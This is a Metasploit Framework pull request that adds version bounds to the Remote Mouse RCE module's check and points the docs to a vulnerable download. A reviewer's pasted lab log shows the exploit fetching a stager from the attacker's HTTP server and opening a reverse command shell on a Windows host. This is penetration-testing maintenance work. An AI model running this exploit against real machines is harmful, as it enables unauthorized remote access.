metasploit-framework
Remote mouse version updates
As per discussion here: https://github.com/rapid7/metasploit-framework/pull/17067#issuecomment-1279339260
Implement an upper bound on the exploitable versions of remote mouse and update the documentation with a vulnerable download link.
Verification
- [ ] update your remote mouse software
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/misc/remote_mouse_rce`
- [ ] `set rhost`
- [ ] run `check` and make sure it gracefully exits since the new version isn't exploitable
@msjenkins-r7 test this please.
Thanks for the enhancement! LGTM 👍
```
msf6 exploit(windows/misc/remote_mouse_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.137:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 172.16.199.137:1978 - The target appears to be vulnerable. Received handshake with version: 400
[*] 172.16.199.137:1978 - Connecting
[*] 172.16.199.137:1978 - Sending Windows key
[*] 172.16.199.137:1978 - Opening command prompt
[*] 172.16.199.137:1978 - Sending stager
[*] 172.16.199.137:1978 - Using URL: http://172.16.199.1:8080/
[+] 172.16.199.137:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 172.16.199.137:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.199.137
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.199.137
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.137:50242) at 2022-10-27 16:27:58 -0400
[*] 172.16.199.137:1978 - Server stopped.
[!] 172.16.199.137:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\rBo8oe3r.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.19042.1706]
-----
C:\Users\msfuser>whoami
whoami
desktop-8athh6o\msfuser
C:\Users\msfuser>exit
exit
```
Release Notes
This PR updates version checking for the recent Remote mouse RCE module and updates the docs with a vulnerable version download link.